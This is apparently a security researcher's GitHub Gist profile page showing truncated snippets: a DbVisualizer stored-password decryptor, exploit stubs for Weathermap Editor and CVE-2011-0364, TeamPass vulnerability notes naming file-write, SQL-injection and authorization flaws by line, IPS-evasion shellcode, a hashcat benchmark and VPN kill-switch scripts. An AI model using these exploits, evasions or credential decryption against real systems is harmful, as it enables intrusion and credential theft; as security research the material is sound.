Skip to content

Instantly share code, notes, and snippets.

Avatar

Gerry Eisenhaur gerry

View GitHub Profile
@gerry
gerry / decrypt_dbvis.py
Last active Jun 24, 2020
A quick hack to extract and decrypt credentials from DbVisualizer config files.
View decrypt_dbvis.py
#!/usr/bin/env python
# decrypt_dbvis.py ~ gerry@twitter.com
# DbVisualizer uses PBEWithMD5AndDES with a static key to store passwords.
# This is a quick hack to extract and decrypt credentials from DbVisualizer config files.
# Tested against DbVisualizer Free 9.0.9 and 9.1.6
"""
[2014-03-25 02:05:30][not-the-sea workspace]$ security/p/gerry/misc/decrypt_dbvis.py
[+] DbVisualizer Password Extractor and Decryptor (@gerryeisenhaur)
[+] Additional Usage Options:
[+] security/p/gerry/misc/decrypt_dbvis.py <config filename>
@gerry
gerry / htl_extract.py
Last active Apr 8, 2020
Extracts the embedded source code from Cisco Security Agent Management Console.
View htl_extract.py
#!/usr/bin/env python
"""htl_extract.py, Extracts the embedded source code from Cisco Security Agent Management Console.
Gerry <gerry@hiredhacker.com>
"""
import os
import sys
import struct
import pefile
from itertools import takewhile
@gerry
gerry / cracking_rig.md
Created Aug 26, 2016
My current cracking rig (4x GTX980ti's)
View cracking_rig.md
@gerry
gerry / hashcat_benchmark.txt
Created Aug 26, 2016
A hashcat benchmark of my current cracking rig (4x GTX980Ti's)
View hashcat_benchmark.txt
hashcat (v3.10-3-g13cbe42) starting in benchmark-mode...
OpenCL Platform #1: NVIDIA Corporation
======================================
- Device #1: GeForce GTX 980 Ti, 1519/6077 MB allocatable, 22MCU
- Device #2: GeForce GTX 980 Ti, 1519/6077 MB allocatable, 22MCU
- Device #3: GeForce GTX 980 Ti, 1519/6077 MB allocatable, 22MCU
- Device #4: GeForce GTX 980 Ti, 1519/6077 MB allocatable, 22MCU
Hashtype: MD4
@gerry
gerry / weathermap_editor_exec.rb
Created Aug 23, 2016
Weathermap Editor (cacti plugin) Arbitrary Code Execution
View weathermap_editor_exec.rb
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
@gerry
gerry / st_upload-exploit.py
Last active Aug 23, 2016
Exploit for CVE-2011-0364
View st_upload-exploit.py
#!/usr/bin/env python
# Thu 24 Jun 2010 04:20:52 AM EDT
import httplib
import mimetools
import StringIO
_boundary = mimetools.choose_boundary()
_host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB'
_csamc = "192.168.0.108"
View teampass_notes.md

Arbitrary file data write (leading to RCE)

./sources/export.queries.php:471: $outstream = fopen($_POST['file'], "a"); (place php in item description) ./sources/admin.queries.php:1110: $fh = fopen($tmp_skfile, 'w'); (admin required)

SQLi

./sources/views.queries.php:437: ORDER BY ".$_POST['order']." ".$_POST['direction']." (admin required)

No Authz on file download:

./sources/downloadFile.php:47: $fp = fopen($_SESSION['settings']['path_to_upload_folder'].'/'.$result['file'], 'rb');

@gerry
gerry / evasions.py
Created Apr 18, 2010
collection of various IPS evasions
View evasions.py
offset = 0x1000 - len(scode) - 32
tls_header = "\xE8\x00\x00\x00\x00" # CALL $+5
tls_header += "\x5E" # POP ESI
tls_header += "\x83\xC6\x1B" # ADD ESI, 0x1b
tls_header += "\xB9" + struct.pack("<L", len(scode)) # MOV ECX, len(scode)
tls_header += "\x64\x8B\x3D\x30\x00\x00\x00" # MOV EDI,DWORD PTR FS:[30]
tls_header += "\x81\xC7" + struct.pack("<L", offset) # ADD EDI, offset
tls_header += "\x57" # PUSH EDI
tls_header += "\xFC" # CLD
tls_header += "\xF3\xA4" # REP MOVSB [EDI], [ESI]
View kill-switch.sh
#!/bin/sh -e
DEFAULT_IFACE=enp0s3
LOCAL_NET=$(ip -o -f inet addr show $DEFAULT_IFACE | awk '{print $4}')
HOST_IPS=198.8.80.220,198.8.80.223,198.8.80.33,198.8.80.149,198.8.80.180,198.8.80.221,198.8.80.50,198.8.80.203,198.8.80.162,198.8.80.176,107.152.98.168,198.8.80.222,107.152.98.159
ufw --force reset
ufw default deny outgoing
ufw default deny incoming
ufw allow out on tun0 from any to any
ufw allow in on tun0 from any to any
View update-pia-hosts.sh
#!/bin/sh -e
HOSTNAME=us-california.privateinternetaccess.com
# host us-california.privateinternetaccess.com|cut -d' ' -f4|tr \\n ,
HOST_IPS=198.8.80.220,198.8.80.223,198.8.80.33,198.8.80.149,198.8.80.180,198.8.80.221,198.8.80.50,198.8.80.203,198.8.80.162,198.8.80.176,107.152.98.168,198.8.80.222,107.152.98.159
IP=$(echo $HOST_IPS | tr , \\n | shuf - | head -n 1)
if grep -q $HOSTNAME /etc/hosts; then
sed -i "s/.*$HOSTNAME/$IP $HOSTNAME/" /etc/hosts
else
echo $IP $HOSTNAME >> /etc/hosts
You can’t perform that action at this time.